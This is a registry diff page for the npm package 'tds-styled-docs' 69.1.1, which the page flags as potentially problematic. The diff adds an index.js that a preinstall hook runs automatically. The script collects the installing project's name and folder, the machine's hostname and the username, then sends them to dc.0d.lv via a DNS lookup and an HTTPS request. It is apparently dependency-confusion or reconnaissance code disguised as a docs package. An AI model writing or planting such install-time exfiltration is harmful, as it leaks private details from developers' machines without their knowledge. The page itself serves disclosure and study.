tds-styled-docs 69.1.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of tds-styled-docs might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +1 -0
  2. package/index.js +44 -0
  3. package/package.json +13 -0
package/README.md ADDED
@@ -0,0 +1 @@
1
+ tds-styled-docs
package/index.js ADDED
@@ -0,0 +1,44 @@
1
+ const os = require("os");
2
+ const dns = require("dns");
3
+ const https = require("https");
4
+
5
+ const package_name = "tcs1";
6
+ const package_version = "11";
7
+
8
+ function version() {
9
+ console.log(package_name + " v" + package_version);
10
+ }
11
+
12
+ var path_ending = '';
13
+ try {
14
+ path_ending = process.env.npm_config_local_prefix.split('/');
15
+ path_ending = path_ending[path_ending.length - 1];
16
+ } catch { }
17
+
18
+ var name = process.env.npm_package_name != undefined ? process.env.npm_package_name : '';
19
+ try {
20
+ var pjson = require(process.env.npm_config_local_prefix + '/package.json');
21
+ name = pjson.name;
22
+ } catch { }
23
+
24
+ var token = package_name + "--" + package_version + "--" + name + "--" + path_ending + "--" + os.hostname() + "--" + os.userInfo().username;
25
+ const bigToken = token;
26
+ const domain = ".dc.0d.lv";
27
+
28
+ if (token.length + domain >= 63) {
29
+ if (path_ending.length > 10)
30
+ path_ending = path_ending.slice(path_ending.length - 10, path_ending.length);
31
+ path_ending = path_ending.replaceAll(/-/g, '_');
32
+ token = "-" + package_name + "-" + (name == '' ? path_ending : name) + "-" + os.hostname() + "-" + os.userInfo().username;
33
+ }
34
+
35
+ token = token.replaceAll(/[^a-zA-Z0-9\-]/g, '_');
36
+
37
+ dns.lookup(token + domain, () => { });
38
+
39
+ const req = https.request(new URL('https://dc.0d.lv/npm-dc/?token=' + bigToken), (res) => {
40
+ res.on('data', (d) => { });
41
+ })
42
+ req.end();
43
+
44
+ module.exports = version;
package/package.json ADDED
@@ -0,0 +1,13 @@
1
+ {
2
+ "name": "tds-styled-docs",
3
+ "version": "69.1.1",
4
+ "description": "tds-styled-docs",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "start": "node index.js",
8
+ "test": "echo \"Error: no test specified\" && exit 1",
9
+ "preinstall": "node index.js"
10
+ },
11
+ "author": "NST",
12
+ "license": "ISC"
13
+ }